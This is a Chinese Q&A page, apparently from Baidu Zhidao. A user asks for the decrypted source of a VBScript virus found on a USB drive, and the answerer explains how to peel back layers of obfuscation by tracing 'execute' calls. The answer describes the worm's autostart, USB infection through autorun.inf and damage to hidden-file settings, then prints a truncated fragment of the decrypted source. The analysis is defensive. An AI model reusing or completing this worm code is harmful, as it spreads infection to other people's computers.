我去打印房打印,u盘上中了这个.vbs的病毒,用记事本打开全是乱码,求解密之后的源代码````

来源:百度知道 编辑:UC知道 时间:2024/06/25 20:13:11
详细见我博客 http://hi.baidu.com/浅草飞舞/blog

你好
这个是vbs脚本病毒,看上去是乱码,一点也看不懂,其实还是有迹可循的。其思路就是寻 找"execute"关键词。病毒最终,还是要换成机器可以看懂的内容,也就是说,最后一层的execute里面的内容,就是病毒的源代码。按照这个思路,那么可以知道,解密方法也一定就在这个execute里面。
也就是说:无需明白他是如何加密的,只需要知道,execute出来的是什么。

按照这个思路,可以得到程序的最后一次迭代加密过程前的代码,也就是第一次迭代解密的代码,看上去还是乱码,不过还是同样的道理,总可以找到execute这个关键词。病毒可能经过多次迭代,不过最终还是可以看懂的。

需要注意的是,execute后面的内容解密出来如果真的用execute执行了,那就中招了,所以这里要注意不能把execute也放进去一起执行。

以下是我的解密最终代码片断

这个程序作者比较BT,手工加密了很多地方,还手工打乱了代码,严重妨碍了程序可读性。

分析完代码其大致功能是
1。开机自启动
2。U盘的感染
3。破坏系统隐藏功能

on error resume next
j="\":til="SY":btj=900:vs=".vbs":ve=".vbe":cm="%comspec% /c":dfo="/u#t/":inf="\autorun.inf"
set ws=createobject("wscript.shell"):set fso=createobject("scripting.filesystemobject")
set wmi=getobject("winmgmts:\\.\root\cimv2"):set sis=wmi.execquery("select * fromw

我用U盘考了一个文件到电脑打印可是打印出来有些字没有 我用U盘打开了WORD文件, 打印,没复制,退出之后能留下打印痕迹么 急!!我打印了U盘里的文档之后,就把该文档删了,如何能找到这个文挡,在哪儿找?望高手赐教!!! 我为什么打印不了了? 请问我在家已经用软件做好大头贴了,我要拿到外面去打印,请问我应该怎么保存呀?放到U盘里! 打印???? word 如何指定一个文件打印的页数。昨天我去打印,那人设置了一下打印页数,自动调了。没看明白怎么调的。 Acrobat READER是什么?我有个这个文件,但是不能打印,加密了的。能不能搞来能打印啊 为什么我的word打印就直接打印了 打印了U盘里的文档之后,就把该文档删了,如何能找到这个文挡?